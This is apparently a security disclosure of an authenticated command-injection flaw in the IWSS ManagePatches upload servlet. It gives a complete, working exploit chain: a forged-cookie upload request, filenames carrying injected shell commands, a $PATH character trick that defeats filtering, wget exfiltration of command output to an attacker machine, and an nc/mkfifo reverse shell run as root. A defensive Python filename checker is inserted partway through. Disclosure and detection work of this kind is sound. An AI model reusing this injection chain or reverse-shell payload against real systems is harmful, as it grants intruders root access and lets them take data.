The com.trend.iwss.gui.servlet.ManagePatches servlet contains a flaw allowing any authenticated user (including ‘Report Only’ users) to execute commands under the context of the root user.
The com.trend.iwss.gui.servlet.ManagePatches servlet is used by users with elevated privileges to upload files (patches). The functionality, however, can be used by any authenticated user simply by substituting their cookie into the request (a stripped-down sample of a valid request is shown below).
POST /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload HTTP/1.1
Host: <server IP>:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept-Encoding: gzip, deflate
Referer: https://<server IP>:8443/admin_patch_mgmt2.jsp?CSRFGuardToken=MQG8WJXIT4J8GASYYA7OVCXXBKUIGG5D
Cookie: JSESSIONID=<INSERT COOKIE VALUE HERE>
Content-Type: multipart/form-data; boundary=---------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml"
The actual injection takes place in the name of the file being uploaded. In the following tests, the delay in the responses indicates that command execution is occurring.
Content-Disposition: form-data; name="patchFileName"; filename="test.xml&ping 127.0.0.1 -c 10"
Content-Disposition: form-data; name="patchFileName"; filename="test.xml&ping 127.0.0.1 -c 30"
This gives any user the ability to execute simple non-interactive commands. However, more complex commands (including a remote shell) are possible.
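A defensive check for the injection point described above, as an added example that is not part of the original write-up or the product's code: it extracts the filename parameter from multipart Content-Disposition lines, applies an allow-list, and reports the shell metacharacters found in rejected names. The allow-list policy and the function names are assumptions; the sample lines are the two request lines shown above.

```python
import re

# Assumed policy for illustration: patch names are letters, digits, '.', '_' and '-'.
# The product's real naming rules are not given on the page.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,128}")

# Shell metacharacters of the kind used in the write-up ('&', backtick, '$'),
# plus close relatives that chain or redirect commands.
SHELL_META = re.compile(r"[&;|`$<>\\\n\r]")

# Pulls the filename parameter out of a multipart Content-Disposition header.
FILENAME_PARAM = re.compile(r'filename="((?:[^"\\]|\\.)*)"', re.IGNORECASE)

# Sample headers copied from the request lines on this page (ASCII quotes).
SAMPLE = [
    'Content-Disposition: form-data; name="patchFileName"; filename="test.xml"',
    'Content-Disposition: form-data; name="patchFileName"; '
    'filename="test.xml&ping 127.0.0.1 -c 10"',
]


def extract_filename(header_line):
    """Return the filename value from a Content-Disposition line, or None."""
    match = FILENAME_PARAM.search(header_line)
    return match.group(1) if match else None


def is_safe_patch_name(name):
    """Allow-list check to run before the name reaches a shell or a file path."""
    return bool(SAFE_NAME.fullmatch(name)) and name not in (".", "..")


def flag_suspicious(header_lines):
    """Return (filename, metacharacters found) for every name failing the allow-list."""
    hits = []
    for line in header_lines:
        name = extract_filename(line)
        if name is None or is_safe_patch_name(name):
            continue
        hits.append((name, sorted(set(SHELL_META.findall(name)))))
    return hits


if __name__ == "__main__":
    for name, meta in flag_suspicious(SAMPLE):
        print(f"rejected upload name {name!r}; shell metacharacters: {meta}")
```

The same allow-list belongs on the server side of the upload handler, and the underlying fix is to stop passing the client-supplied name to a shell at all.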
By issuing a ‘wget <ip>’ of the attacker machine, a response is seen. However, exfiltrating information is a bit more tricky. Special characters like ‘/’, ‘<’ and ‘>’ are not sent across to the server. But by utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user running a wget to retrieve the current user using the given command (where [ip address] is your receiving machine):
filename="test.xml&wget `echo [ip address]``echo $PATH | cut -c1``id`"
EXPLANATION: using ` (or even $()) to escape, it is possible to pull the ‘/’ character from the current $PATH and insert it into the command, creating the full wget of [ip address]/`id`
Apache Log –
This grants the ability to exfiltrate some data, as well as upload (via wget) files.
Now the attacker has the ability to create a shell by uploading a file containing the following:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f
To upload the file, the attacker simply names this file shell, then uploads it using this vulnerability and wget:
test.xml&wget `echo [ip address]``echo $PATH | cut -c1`shell
Once the file has been uploaded (it will be placed in the /var/iwss/patch/bin folder), the attacker can chmod and then execute the file as a script, creating a reverse shell running as root:
test.xml&chmod a+x shell
test.xml&.`echo $PATH | cut -c1`shell